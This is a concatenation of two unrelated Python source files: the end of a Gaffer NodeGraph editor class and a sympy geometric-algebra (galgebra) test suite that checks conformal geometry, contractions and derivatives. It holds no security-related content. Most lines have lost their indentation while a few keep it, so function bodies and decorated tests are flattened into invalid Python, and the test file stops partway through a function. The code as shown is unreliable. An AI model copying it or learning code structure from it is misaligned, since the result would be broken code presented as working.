def __rootParentChanged( self, root, oldParent ) :
# root has been deleted
## \todo I'm not sure if we should be responsible for removing ourselves or not.
# Perhaps we should just signal that we're not valid in some way and the CompoundEditor should
# remove us? Consider how this relates to NodeEditor.__deleteWindow() too.
self.parent().removeChild( self )
@classmethod
def __getNodeInputConnectionsVisible( cls, graphGadget, node ) :
return not graphGadget.getNodeInputConnectionsMinimised( node )
@classmethod
def __setNodeInputConnectionsVisible( cls, graphGadget, node, value ) :
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
graphGadget.setNodeInputConnectionsMinimised( node, not value )
@classmethod
def __getNodeOutputConnectionsVisible( cls, graphGadget, node ) :
return not graphGadget.getNodeOutputConnectionsMinimised( node )
@classmethod
def __setNodeOutputConnectionsVisible( cls, graphGadget, node, value ) :
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
graphGadget.setNodeOutputConnectionsMinimised( node, not value )
@classmethod
def __setEnabled( cls, node, value ) :
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
node.enabledPlug().setValue( value )
GafferUI.EditorWidget.registerType( "NodeGraph", NodeGraph )
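# Example startup-script usage (a sketch, per the nodeContextMenuSignal()
# documentation above): install the standard connection-visibility and
# enabled-plug items on every node's context menu.
#
#	def __nodeContextMenu( nodeGraph, node, menuDefinition ) :
#		GafferUI.NodeGraph.appendConnectionVisibilityMenuDefinitions( nodeGraph, node, menuDefinition )
#		GafferUI.NodeGraph.appendEnabledPlugMenuDefinitions( nodeGraph, node, menuDefinition )
#
#	__nodeContextMenuConnection = GafferUI.NodeGraph.nodeContextMenuSignal().connect( __nodeContextMenu )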
# ===== next source file =====
# sympy/galgebra/tests/test_ga.py
"""
The reference D&L is "Geometric Algebra for Physicists" by Doran and Lasenby
"""
from sympy.core import expand, Rational, S, Symbol, symbols
from sympy.functions import sin, cos
from sympy.galgebra.ga import MV, Nga, Com
from sympy.galgebra.printing import GA_Printer
from sympy.matrices import Matrix
from sympy.simplify import collect, simplify
from sympy.utilities.pytest import XFAIL
def F(x, n, nbar):
"""
Conformal Mapping Function from 3D Euclidean space to 5D conformal space
where the images of all maps are null vectors.
"""
return Rational(1, 2)*((x*x)*n + 2*x - nbar)
def make_vector(a, m=3):
global n, nbar
if isinstance(a, str):
sym_str = ''
for i in range(m):
sym_str += a + str(i + 1) + ' '
sym_lst = list(symbols(sym_str))
sym_lst.append(S.Zero)
sym_lst.append(S.Zero)
a = MV(sym_lst, 'vector')
return F(a, n, nbar)
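def _null_point_demo():
    """
    Sketch (the underscore prefix keeps it out of test collection): F maps a
    Euclidean point to a null conformal vector, so the square of the image
    should reduce to zero once n and nbar are set up as in the tests below.
    """
    global n, nbar
    metric = '1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 0 2,0 0 0 2 0'
    e1, e2, e3, n, nbar = MV.setup('e_1 e_2 e_3 n nbar', metric)
    A = make_vector(e1)
    return A*A  # expected to simplify to zero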
def test_rmul():
"""
Test for commutative scalar multiplication. Leftover from when sympy and
numpy were not working together and __mul__ and __rmul__ would not give the
same answer.
"""
x, y, z = MV.setup('x y z')
a, b, c = symbols('a b c')
assert 5*x == x*5
assert Rational(1, 2)*x == x*Rational(1, 2)
assert a*x == x*a
def test_contraction():
"""
Test for inner product and left and right contraction
"""
e_1, e_2, e_3 = MV.setup('e_1 e_2 e_3', '1 0 0, 0 1 0, 0 0 1')
assert ((e_1 ^ e_3) | e_1) == -e_3
assert ((e_1 ^ e_3) > e_1) == -e_3
assert (e_1 | (e_1 ^ e_3)) == e_3
assert (e_1 < (e_1 ^ e_3)) == e_3
assert ((e_1 ^ e_3) < e_1) == 0
assert (e_1 > (e_1 ^ e_3)) == 0
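# Note on the overloaded operators exercised above (galgebra's MV class):
# '|' is the inner product, '<' the left contraction, '>' the right
# contraction and '^' the outer (wedge) product. Since Python parses '<' and
# '>' as chained comparisons and '^' binds loosely, every product is wrapped
# in parentheses before being compared with '=='.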
def test_substitution():
e_x, e_y, e_z = MV.setup('e_x e_y e_z', '1 0 0, 0 1 0, 0 0 1')
x, y, z = symbols('x y z')
X = x*e_x + y*e_y + z*e_z
Y = X.subs([(x, 2), (y, 3), (z, 4)])
assert Y == 2*e_x + 3*e_y + 4*e_z
def test_vector_extraction():
"""
Show that conformal bivector encodes two points. See D&L Section 10.4.1
"""
metric = ' 0 -1 #,' + \
'-1 0 #,' + \
' # # #,'
P1, P2, a = MV.setup('P1 P2 a', metric)
"""
P1 and P2 are null vectors and hence encode points in conformal space.
Show that P1 and P2 can be extracted from the bivector B = P1^P2. a is a
third vector in the conformal space with a.B not 0.
"""
B = P1 ^ P2
Bsq = B*B
ap = a - (a ^ B)*B
Ap = ap + ap*B
Am = ap - ap*B
P1dota = Symbol('(P1.a)')
P2dota = Symbol('(P2.a)')
Ap_test = (-2*P2dota)*P1
Am_test = (-2*P1dota)*P2
assert Ap == Ap_test
assert Am == Am_test
Ap2 = Ap*Ap
Am2 = Am*Am
assert Ap2 == S.Zero
assert Am2 == S.Zero
def test_metrics():
"""
Test specific metrics (diagpq, arbitrary_metric, arbitrary_metric_conformal)
"""
    from sympy.galgebra.ga import diagpq, arbitrary_metric
metric = diagpq(3)
p1, p2, p3 = MV.setup('p1 p2 p3', metric, debug=0)
x1, y1, z1 = symbols('x1 y1 z1')
x2, y2, z2 = symbols('x2 y2 z2')
v1 = x1*p1 + y1*p2 + z1*p3
v2 = x2*p1 + y2*p2 + z2*p3
prod1 = v1*v2
prod2 = (v1|v2) + (v1^v2)
diff = prod1 - prod2
assert diff == MV(S.Zero)
metric = arbitrary_metric(3)
p1, p2, p3 = MV.setup('p1 p2 p3', metric, debug=0)
v1 = x1*p1 + y1*p2 + z1*p3
v2 = x2*p1 + y2*p2 + z2*p3
prod1 = v1*v2
prod2 = (v1|v2) + (v1^v2)
diff = prod1 - prod2
assert diff == MV(S.Zero)
@XFAIL
def test_metrics_xfail():
    from sympy.galgebra.ga import arbitrary_metric_conformal
    metric = arbitrary_metric_conformal(3)
    p1, p2, p3 = MV.setup('p1 p2 p3', metric, debug=0)
    x1, y1, z1 = symbols('x1 y1 z1')
    x2, y2, z2 = symbols('x2 y2 z2')
    v1 = x1*p1 + y1*p2 + z1*p3
    v2 = x2*p1 + y2*p2 + z2*p3
    prod1 = v1*v2
    prod2 = (v1|v2) + (v1^v2)
    diff = prod1 - prod2
    assert diff == MV(S.Zero)
def test_geometry():
"""
Test conformal geometric description of circles, lines, spheres, and planes.
"""
metric = '1 0 0 0 0,' + \
'0 1 0 0 0,' + \
'0 0 1 0 0,' + \
'0 0 0 0 2,' + \
'0 0 0 2 0'
e0, e1, e2, n, nbar = MV.setup('e0 e1 e2 n nbar', metric, debug=0)
e = n + nbar
#conformal representation of points
A = F(e0, n, nbar) # point a = (1,0,0) A = F(a)
B = F(e1, n, nbar) # point b = (0,1,0) B = F(b)
C = F(-1*e0, n, nbar) # point c = (-1,0,0) C = F(c)
D = F(e2, n, nbar) # point d = (0,0,1) D = F(d)
x0, x1, x2 = symbols('x0 x1 x2')
X = F(MV([x0, x1, x2], 'vector'), n, nbar)
Circle = A ^ B ^ C ^ X
Line = A ^ B ^ n ^ X
Sphere = A ^ B ^ C ^ D ^ X
Plane = A ^ B ^ n ^ D ^ X
#Circle through a, b, and c
Circle_test = -x2*(e0 ^ e1 ^ e2 ^ n) + x2*(
e0 ^ e1 ^ e2 ^ nbar) + Rational(1, 2)*(-1 + x0**2 + x1**2 + x2**2)*(e0 ^ e1 ^ n ^ nbar)
diff = Circle - Circle_test
assert diff == S.Zero
#Line through a and b
Line_test = -x2*(e0 ^ e1 ^ e2 ^ n) + \
Rational(1, 2)*(-1 + x0 + x1)*(e0 ^ e1 ^ n ^ nbar) + \
(Rational(1, 2)*x2)*(e0 ^ e2 ^ n ^ nbar) + \
(-Rational(1, 2)*x2)*(e1 ^ e2 ^ n ^ nbar)
diff = Line - Line_test
assert diff == S.Zero
#Sphere through a, b, c, and d
Sphere_test = Rational(1, 2)*(1 - x0**2 - x1**2 - x2**2)*(e0 ^ e1 ^ e2 ^ n ^ nbar)
diff = Sphere - Sphere_test
assert diff == S.Zero
#Plane through a, b, and d
Plane_test = Rational(1, 2)*(1 - x0 - x1 - x2)*(e0 ^ e1 ^ e2 ^ n ^ nbar)
diff = Plane - Plane_test
assert diff == S.Zero
def test_extract_plane_and_line():
"""
Show that conformal trivector encodes planes and lines. See D&L section
10.4.2
"""
metric = '# # # 0 0,' + \
'# # # 0 0,' + \
'# # # 0 0,' + \
'0 0 0 0 2,' + \
'0 0 0 2 0'
p1, p2, p3, n, nbar = MV.setup('p1 p2 p3 n nbar', metric, debug=0)
P1 = F(p1, n, nbar)
P2 = F(p2, n, nbar)
P3 = F(p3, n, nbar)
#Line through p1 and p2
L = P1 ^ P2 ^ n
delta = (L | n) | nbar
delta_test = 2*p1 - 2*p2
diff = delta - delta_test
assert diff == S.Zero
#Plane through p1, p2, and p3
C = P1 ^ P2 ^ P3
delta = ((C ^ n) | n) | nbar
delta_test = 2*(p1 ^ p2) - 2*(p1 ^ p3) + 2*(p2 ^ p3)
diff = delta - delta_test
assert diff == S.Zero
@XFAIL
def test_reciprocal_frame():
"""
Test of formula for general reciprocal frame of three vectors.
Let three independent vectors be e1, e2, and e3. The reciprocal
vectors E1, E2, and E3 obey the relations:
e_i.E_j = delta_ij*(e1^e2^e3)**2
"""
metric = '1 # #,' + \
'# 1 #,' + \
'# # 1,'
e1, e2, e3 = MV.setup('e1 e2 e3', metric)
E = e1 ^ e2 ^ e3
Esq = (E*E)()
Esq_inv = 1/Esq
E1 = (e2 ^ e3)*E
E2 = (-1)*(e1 ^ e3)*E
E3 = (e1 ^ e2)*E
    w = (E1 | e2)
    w.collect(MV.g)
    w = w().expand()
    assert w == 0
w = (E1 | e3)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E2 | e1)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E2 | e3)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E3 | e1)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E3 | e2)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E1 | e1)
w = w().expand()
Esq = Esq.expand()
assert w/Esq == 1
w = (E2 | e2)
w = w().expand()
assert w/Esq == 1
w = (E3 | e3)
w = w().expand()
assert w/Esq == 1
@XFAIL
def test_derivative():
coords = x, y, z = symbols('x y z')
e_x, e_y, e_z, _ = MV.setup('e', '1 0 0, 0 1 0, 0 0 1', coords=coords)
X = x*e_x + y*e_y + z*e_z
a = MV('a', 'vector')
assert ((X | a).grad()) == a
assert ((X*X).grad()) == 2*X
assert (X*X*X).grad() == 5*X*X
assert X.grad_int() == 3
@XFAIL
def test_str():
e_1, e_2, e_3 = MV.setup('e_1 e_2 e_3', '1 0 0, 0 1 0, 0 0 1')
X = MV('x')
    assert str(X) == 'x + x__1*e_1 + x__2*e_2 + x__3*e_3 + x__12*e_1^e_2 + x__13*e_1^e_3 + x__23*e_2^e_3 + x__123*e_1^e_2^e_3'
Y = MV('y', 'spinor')
assert str(Y) == 'y + y__12*e_1^e_2 + y__13*e_1^e_3 + y__23*e_2^e_3'
Z = X + Y
assert str(Z) == 'x + y + x__1*e_1 + x__2*e_2 + x__3*e_3 + (x__12 + y__12)*e_1^e_2 + (x__13 + y__13)*e_1^e_3 + (x__23 + y__23)*e_2^e_3 + x__123*e_1^e_2^e_3'
assert str(e_1 | e_1) == '1'
@XFAIL
def test_metric():
MV.setup('e_1 e_2 e_3', '[1,1,1]')
assert MV.metric == Matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
@XFAIL
def test_constructor():
"""
Test various multivector constructors
"""
e_1, e_2, e_3 = MV.setup('e_1 e_2 e_3', '[1,1,1]')
assert str(MV('a', 'scalar')) == 'a'
assert str(MV('a', 'vector')) == 'a__1*e_1 + a__2*e_2 + a__3*e_3'
assert str(MV('a', 'pseudo')) == 'a__123*e_1^e_2^e_3'
assert str(MV('a', 'spinor')) == 'a + a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3'
assert str(MV('a')) == 'a + a__1*e_1 + a__2*e_2 + a__3*e_3 + a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3 + a__123*e_1^e_2^e_3'
assert str(MV([2, 'a'], 'grade')) == 'a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3'
assert str(MV('a', 'grade2')) == 'a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3'
def test_basic_multivector_operations():
with GA_Printer():
(ex, ey, ez) = MV.setup('e*x|y|z')
A = MV('A', 'mv')
assert str(A) == 'A + A__x*e_x + A__y*e_y + A__z*e_z + A__xy*e_x^e_y + A__xz*e_x^e_z + A__yz*e_y^e_z + A__xyz*e_x^e_y^e_z'
X = MV('X', 'vector')
Y = MV('Y', 'vector')
assert str(X) == 'X__x*e_x + X__y*e_y + X__z*e_z'
assert str(Y) == 'Y__x*e_x + Y__y*e_y + Y__z*e_z'
assert str((X*Y)) == '(e_x.e_x)*X__x*Y__x + (e_x.e_y)*X__x*Y__y + (e_x.e_y)*X__y*Y__x + (e_x.e_z)*X__x*Y__z + (e_x.e_z)*X__z*Y__x + (e_y.e_y)*X__y*Y__y + (e_y.e_z)*X__y*Y__z + (e_y.e_z)*X__z*Y__y + (e_z.e_z)*X__z*Y__z + (X__x*Y__y - X__y*Y__x)*e_x^e_y + (X__x*Y__z - X__z*Y__x)*e_x^e_z + (X__y*Y__z - X__z*Y__y)*e_y^e_z'
assert str((X ^ Y)) == '(X__x*Y__y - X__y*Y__x)*e_x^e_y + (X__x*Y__z - X__z*Y__x)*e_x^e_z + (X__y*Y__z - X__z*Y__y)*e_y^e_z'
assert str((X | Y)) == '(e_x.e_x)*X__x*Y__x + (e_x.e_y)*X__x*Y__y + (e_x.e_y)*X__y*Y__x + (e_x.e_z)*X__x*Y__z + (e_x.e_z)*X__z*Y__x + (e_y.e_y)*X__y*Y__y + (e_y.e_z)*X__y*Y__z + (e_y.e_z)*X__z*Y__y + (e_z.e_z)*X__z*Y__z'
(ex, ey) = MV.setup('e*x|y')
X = MV('X', 'vector')
A = MV('A', 'spinor')
assert str(X) == 'X__x*e_x + X__y*e_y'
assert str(A) == 'A + A__xy*e_x^e_y'
assert str((X | A)) == '(-A__xy*((e_x.e_y)*X__x + (e_y.e_y)*X__y))*e_x + (A__xy*((e_x.e_x)*X__x + (e_x.e_y)*X__y))*e_y'
assert str((X < A)) == '(-A__xy*((e_x.e_y)*X__x + (e_y.e_y)*X__y))*e_x + (A__xy*((e_x.e_x)*X__x + (e_x.e_y)*X__y))*e_y'
assert str((A > X)) == '(A__xy*((e_x.e_y)*X__x + (e_y.e_y)*X__y))*e_x + (-A__xy*((e_x.e_x)*X__x + (e_x.e_y)*X__y))*e_y'
(ex, ey) = MV.setup('e*x|y', metric='[1,1]')
X = MV('X', 'vector')
A = MV('A', 'spinor')
assert str(X) == 'X__x*e_x + X__y*e_y'
assert str(A) == 'A + A__xy*e_x^e_y'
assert str((X*A)) == '(A*X__x - A__xy*X__y)*e_x + (A*X__y + A__xy*X__x)*e_y'
assert str((X | A)) == '-A__xy*X__y*e_x + A__xy*X__x*e_y'
assert str((X < A)) == '-A__xy*X__y*e_x + A__xy*X__x*e_y'
assert str((X > A)) == 'A*X__x*e_x + A*X__y*e_y'
assert str((A*X)) == '(A*X__x + A__xy*X__y)*e_x + (A*X__y - A__xy*X__x)*e_y'
assert str((A | X)) == 'A__xy*X__y*e_x - A__xy*X__x*e_y'
assert str((A < X)) == 'A*X__x*e_x + A*X__y*e_y'
assert str((A > X)) == 'A__xy*X__y*e_x - A__xy*X__x*e_y'
return
def test_check_generalized_BAC_CAB_formulas():
with GA_Printer():
(a, b, c, d, e) = MV.setup('a b c d e')
assert str(a | (b*c)) == '-(a.c)*b + (a.b)*c'
assert str(a | (b ^ c)) == '-(a.c)*b + (a.b)*c'
assert str(a | (b ^ c ^ d)) == '(a.d)*b^c - (a.c)*b^d + (a.b)*c^d'
assert str((a | (b ^ c)) + (c | (a ^ b)) + (b | (c ^ a))) == '0'
assert str(a*(b ^ c) - b*(a ^ c) + c*(a ^ b)) == '3*a^b^c'
assert str(a*(b ^ c ^ d) - b*(a ^ c ^ d) + c*(a ^ b ^ d) - d*(a ^ b ^ c)) == '4*a^b^c^d'
assert str((a ^ b) | (c ^ d)) == '-(a.c)*(b.d) + (a.d)*(b.c)'
assert str(((a ^ b) | c) | d) == '-(a.c)*(b.d) + (a.d)*(b.c)'
assert str(Com(a ^ b, c ^ d)) == '-(b.d)*a^c + (b.c)*a^d + (a.d)*b^c - (a.c)*b^d'
assert str((a | (b ^ c)) | (d ^ e)) == '(-(a.b)*(c.e) + (a.c)*(b.e))*d + ((a.b)*(c.d) - (a.c)*(b.d))*e'
return
def test_derivatives_in_rectangular_coordinates():
with GA_Printer():
X = (x, y, z) = symbols('x y z')
(ex, ey, ez, grad) = MV.setup('e_x e_y e_z', metric='[1,1,1]', coords=X)
f = MV('f', 'scalar', fct=True)
A = MV('A', 'vector', fct=True)
B = MV('B', 'grade2', fct=True)
C = MV('C', 'mv', fct=True)
assert str(f) == 'f'
assert str(A) == 'A__x*e_x + A__y*e_y + A__z*e_z'
assert str(B) == 'B__xy*e_x^e_y + B__xz*e_x^e_z + B__yz*e_y^e_z'
assert str(C) == 'C + C__x*e_x + C__y*e_y + C__z*e_z + C__xy*e_x^e_y + C__xz*e_x^e_z + C__yz*e_y^e_z + C__xyz*e_x^e_y^e_z'
assert str(grad*f) == 'D{x}f*e_x + D{y}f*e_y + D{z}f*e_z'
assert str(grad | A) == 'D{x}A__x + D{y}A__y + D{z}A__z'
assert str(grad*A) == 'D{x}A__x + D{y}A__y + D{z}A__z + (-D{y}A__x + D{x}A__y)*e_x^e_y + (-D{z}A__x + D{x}A__z)*e_x^e_z + (-D{z}A__y + D{y}A__z)*e_y^e_z'
assert str(-MV.I*(grad ^ A)) == '(-D{z}A__y + D{y}A__z)*e_x + (D{z}A__x - D{x}A__z)*e_y + (-D{y}A__x + D{x}A__y)*e_z'
assert str(grad*B) == '(-(D{y}B__xy + D{z}B__xz))*e_x + (D{x}B__xy - D{z}B__yz)*e_y + (D{x}B__xz + D{y}B__yz)*e_z + (D{z}B__xy - D{y}B__xz + D{x}B__yz)*e_x^e_y^e_z'
assert str(grad ^ B) == '(D{z}B__xy - D{y}B__xz + D{x}B__yz)*e_x^e_y^e_z'
assert str(grad | B) == '(-(D{y}B__xy + D{z}B__xz))*e_x + (D{x}B__xy - D{z}B__yz)*e_y + (D{x}B__xz + D{y}B__yz)*e_z'
assert str(grad < A) == 'D{x}A__x + D{y}A__y + D{z}A__z'
assert str(grad > A) == 'D{x}A__x + D{y}A__y + D{z}A__z'
assert str(grad < B) == '(-(D{y}B__xy + D{z}B__xz))*e_x + (D{x}B__xy - D{z}B__yz)*e_y + (D{x}B__xz + D{y}B__yz)*e_z'
assert str(grad > B) == '0'
assert str(grad < C) == 'D{x}C__x + D{y}C__y + D{z}C__z + (-(D{y}C__xy + D{z}C__xz))*e_x + (D{x}C__xy - D{z}C__yz)*e_y + (D{x}C__xz + D{y}C__yz)*e_z + D{z}C__xyz*e_x^e_y - D{y}C__xyz*e_x^e_z + D{x}C__xyz*e_y^e_z'
assert str(grad > C) == 'D{x}C__x + D{y}C__y + D{z}C__z + D{x}C*e_x + D{y}C*e_y + D{z}C*e_z'
return
def test_derivatives_in_spherical_coordinates():
with GA_Printer():
X = (r, th, phi) = symbols('r theta phi')
curv = [[r*cos(phi)*sin(th), r*sin(phi)*sin(th), r*cos(th)], [1, r, r*sin(th)]]
(er, eth, ephi, grad) = MV.setup('e_r e_theta e_phi', metric='[1,1,1]', coords=X, curv=curv)
f = MV('f', 'scalar', fct=True)
A = MV('A', 'vector', fct=True)
B = MV('B', 'grade2', fct=True)
assert str(f) == 'f'
assert str(A) == 'A__r*e_r + A__theta*e_theta + A__phi*e_phi'
assert str(B) == 'B__rtheta*e_r^e_theta + B__rphi*e_r^e_phi + B__thetaphi*e_theta^e_phi'
assert str(grad*f) == 'D{r}f*e_r + D{theta}f/r*e_theta + D{phi}f/(r*sin(theta))*e_phi'
assert str(grad | A) == 'D{r}A__r + 2*A__r/r + A__theta*cos(theta)/(r*sin(theta)) + D{theta}A__theta/r + D{phi}A__phi/(r*sin(theta))'
assert str(-MV.I*(grad ^ A)) == '((A__phi*cos(theta)/sin(theta) + D{theta}A__phi - D{phi}A__theta/sin(theta))/r)*e_r + (-D{r}A__phi - A__phi/r + D{phi}A__r/(r*sin(theta)))*e_theta + (D{r}A__theta + A__theta/r - D{theta}A__r/r)*e_phi'
assert str(grad ^ B) == '(D{r}B__thetaphi - B__rphi*cos(theta)/(r*sin(theta)) + 2*B__thetaphi/r - D{theta}B__rphi/r + D{phi}B__rtheta/(r*sin(theta)))*e_r^e_theta^e_phi'
return
def test_rounding_numerical_components():
with GA_Printer():
(ex, ey, ez) = MV.setup('e_x e_y e_z', metric='[1,1,1]')
X = 1.2*ex + 2.34*ey + 0.555*ez
Y = 0.333*ex + 4*ey + 5.3*ez
assert str(X) == '1.20000000000000*e_x + 2.34000000000000*e_y + 0.555000000000000*e_z'
assert str(Nga(X, 2)) == '1.2*e_x + 2.3*e_y + 0.55*e_z'
assert str(X*Y) == '12.7011000000000 + 4.02078000000000*e_x^e_y + 6.17518500000000*e_x^e_z + 10.1820000000000*e_y^e_z'
assert str(Nga(X*Y, 2)) == '13. + 4.0*e_x^e_y + 6.2*e_x^e_z + 10.*e_y^e_z'
return
def test_noneuclidian_distance_calculation():
from sympy import solve, sqrt
with GA_Printer():
metric = '0 # #,# 0 #,# # 1'
(X, Y, e) = MV.setup('X Y e', metric)
assert str((X ^ Y)*(X ^ Y)) == '(X.Y)**2'
L = X ^ Y ^ e
B = L*e
assert str(B) == 'X^Y - (Y.e)*X^e + (X.e)*Y^e'
Bsq = B*B
assert str(Bsq) == '(X.Y)*((X.Y) - 2*(X.e)*(Y.e))'
Bsq = Bsq.scalar()
assert str(B) == 'X^Y - (Y.e)*X^e + (X.e)*Y^e'
BeBr = B*e*B.rev()
assert str(BeBr) == '((X.Y)*(-(X.Y) + 2*(X.e)*(Y.e)))*e'
assert str(B*B) == '(X.Y)*((X.Y) - 2*(X.e)*(Y.e))'
assert str(L*L) == '(X.Y)*((X.Y) - 2*(X.e)*(Y.e))'
(s, c, Binv, M, BigS, BigC, alpha, XdotY, Xdote, Ydote) = symbols('s c (1/B) M S C alpha (X.Y) (X.e) (Y.e)')
Bhat = Binv*B
R = c + s*Bhat
assert str(R) == 'c + (1/B)*s*X^Y - (1/B)*(Y.e)*s*X^e + (1/B)*(X.e)*s*Y^e'
Z = R*X*R.rev()
Z.obj = expand(Z.obj)
Z.obj = Z.obj.collect([Binv, s, c, XdotY])
assert str(Z) == '((1/B)**2*(X.Y)**2*s**2 - 2*(1/B)**2*(X.Y)*(X.e)*(Y.e)*s**2 + 2*(1/B)*(X.Y)*c*s - 2*(1/B)*(X.e)*(Y.e)*c*s + c**2)*X + 2*(1/B)*(X.e)**2*c*s*Y + (2*(1/B)*(X.Y)*(X.e)*s*(-(1/B)*(X.Y)*s + 2*(1/B)*(X.e)*(Y.e)*s - c))*e'
W = Z | Y
# From this point forward all calculations are with sympy scalars
W = W.scalar()
assert str(W) == '(1/B)**2*(X.Y)**3*s**2 - 4*(1/B)**2*(X.Y)**2*(X.e)*(Y.e)*s**2 + 4*(1/B)**2*(X.Y)*(X.e)**2*(Y.e)**2*s**2 + 2*(1/B)*(X.Y)**2*c*s - 4*(1/B)*(X.Y)*(X.e)*(Y.e)*c*s + (X.Y)*c**2'
W = expand(W)
W = simplify(W)
W = W.collect([s*Binv])
M = 1/Bsq
W = W.subs(Binv**2, M)
W = simplify(W)
Bmag = sqrt(XdotY**2 - 2*XdotY*Xdote*Ydote)
W = W.collect([Binv*c*s, XdotY])
#Double angle substitutions
W = W.subs(2*XdotY**2 - 4*XdotY*Xdote*Ydote, 2/(Binv**2))
W = W.subs(2*c*s, BigS)
W = W.subs(c**2, (BigC + 1)/2)
W = W.subs(s**2, (BigC - 1)/2)
W = simplify(W)
W = expand(W)
W = W.subs(1/Binv, Bmag)
assert str(W) == '(X.Y)*C - (X.e)*(Y.e)*C + (X.e)*(Y.e) + S*sqrt((X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e))'
Wd = collect(W, [BigC, BigS], exact=True, evaluate=False)
Wd_1 = Wd[S.One]
Wd_C = Wd[BigC]
Wd_S = Wd[BigS]
assert str(Wd_1) == '(X.e)*(Y.e)'
assert str(Wd_C) == '(X.Y) - (X.e)*(Y.e)'
assert str(Wd_S) == 'sqrt((X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e))'
assert str(Bmag) == 'sqrt((X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e))'
Wd_1 = Wd_1.subs(Bmag, 1/Binv)
Wd_C = Wd_C.subs(Bmag, 1/Binv)
Wd_S = Wd_S.subs(Bmag, 1/Binv)
lhs = Wd_1 + Wd_C*BigC
rhs = -Wd_S*BigS
lhs = lhs**2
rhs = rhs**2
W = expand(lhs - rhs)
W = expand(W.subs(1/Binv**2, Bmag**2))
W = expand(W.subs(BigS**2, BigC**2 - 1))
W = W.collect([BigC, BigC**2], evaluate=False)
a = simplify(W[BigC**2])
b = simplify(W[BigC])
c = simplify(W[S.One])
assert str(a) == '(X.e)**2*(Y.e)**2'
assert str(b) == '2*(X.e)*(Y.e)*((X.Y) - (X.e)*(Y.e))'
assert str(c) == '(X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e) + (X.e)**2*(Y.e)**2'
x = Symbol('x')
C = solve(a*x**2 + b*x + c, x)[0]
assert str(expand(simplify(expand(C)))) == '-(X.Y)/((X.e)*(Y.e)) + 1'
return
def test_conformal_representations_of_circles_lines_spheres_and_planes():
global n, nbar
with GA_Printer():
metric = '1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 0 2,0 0 0 2 0'
(e1, e2, e3, n, nbar) = MV.setup('e_1 e_2 e_3 n nbar', metric)
e = n + nbar
#conformal representation of points
A = make_vector(e1)
B = make_vector(e2)
C = make_vector(-e1)
D = make_vector(e3)
X = make_vector('x', 3)
assert str(A) == 'e_1 + 1/2*n - 1/2*nbar'
assert str(B) == 'e_2 + 1/2*n - 1/2*nbar'
assert str(C) == '-e_1 + 1/2*n - 1/2*nbar'
assert str(D) == 'e_3 + 1/2*n - 1/2*nbar'
assert str(X) == 'x1*e_1 + x2*e_2 + x3*e_3 + ((x1**2 + x2**2 + x3**2)/2)*n - 1/2*nbar'
assert str((A ^ B ^ C ^ X)) == '-x3*e_1^e_2^e_3^n + x3*e_1^e_2^e_3^nbar + ((x1**2 + x2**2 + x3**2 - 1)/2)*e_1^e_2^n^nbar'
assert str((A ^ B ^ n ^ X)) == '-x3*e_1^e_2^e_3^n + ((x1 + x2 - 1)/2)*e_1^e_2^n^nbar + x3/2*e_1^e_3^n^nbar - x3/2*e_2^e_3^n^nbar'
assert str((((A ^ B) ^ C) ^ D) ^ X) == '((-x1**2 - x2**2 - x3**2 + 1)/2)*e_1^e_2^e_3^n^nbar'
assert str((A ^ B ^ n ^ D ^ X)) == '((-x1 - x2 - x3 + 1)/2)*e_1^e_2^e_3^n^nbar'
L = (A ^ B ^ e) ^ X
assert str(L) == '-x3*e_1^e_2^e_3^n - x3*e_1^e_2^e_3^nbar + (-x1**2/2 + x1 - x2**2/2 + x2 - x3**2/2 - 1/2)*e_1^e_2^n^nbar + x3*e_1^e_3^n^nbar - x3*e_2^e_3^n^nbar'
return
def test_properties_of_geometric_objects():
with GA_Printer():
metric = '# # # 0 0,' + \
'# # # 0 0,' + \
'# # # 0 0,' + \
'0 0 0 0 2,' + \
'0 0 0 2 0'
(p1, p2, p3, n, nbar) = MV.setup('p1 p2 p3 n nbar', metric)
P1 = F(p1, n, nbar)
P2 = F(p2, n, nbar)
P3 = F(p3, n, nbar)
L = P1 ^ P2 ^ n
delta = (L | n) | nbar
assert str(delta) == '2*p1 - 2*p2'
C = P1 ^ P2 ^ P3
delta = ((C ^ n) | n) | nbar
assert str(delta) == '2*p1^p2 - 2*p1^p3 + 2*p2^p3'
assert str((p2 - p1) ^ (p3 - p1)) == 'p1^p2 - p1^p3 + p2^p3'
return
def test_extracting_vectors_from_conformal_2_blade():
with GA_Printer():
metric = ' 0 -1 #,' + \
'-1 0 #,' + \
' # # #,'
(P1, P2, a) = MV.setup('P1 P2 a', metric)
B = P1 ^ P2
Bsq = B*B
assert str(Bsq) == '1'
ap = a - (a ^ B)*B
assert str(ap) == '-(P2.a)*P1 - (P1.a)*P2'
Ap = ap + ap*B
Am = ap - ap*B
assert str(Ap) == '-2*(P2.a)*P1'
assert str(Am) == '-2*(P1.a)*P2'
assert str(Ap*Ap) == '0'
assert str(Am*Am) == '0'
aB = a | B
assert str(aB) == '-(P2.a)*P1 + (P1.a)*P2'
return
def test_reciprocal_frame_test():
with GA_Printer():
metric = '1 # #,' + \
'# 1 #,' + \
'# # 1,'
(e1, e2, e3) = MV.setup('e1 e2 e3', metric)
E = e1 ^ e2 ^ e3
Esq = (E*E).scalar()
assert str(E) == 'e1^e2^e3'
assert str(Esq) == '(e1.e2)**2 - 2*(e1.e2)*(e1.e3)*(e2.e3) + (e1.e3)**2 + (e2.e3)**2 - 1'
Esq_inv = 1/Esq
E1 = (e2 ^ e3)*E
E2 = (-1)*(e1 ^ e3)*E
E3 = (e1 ^ e2)*E
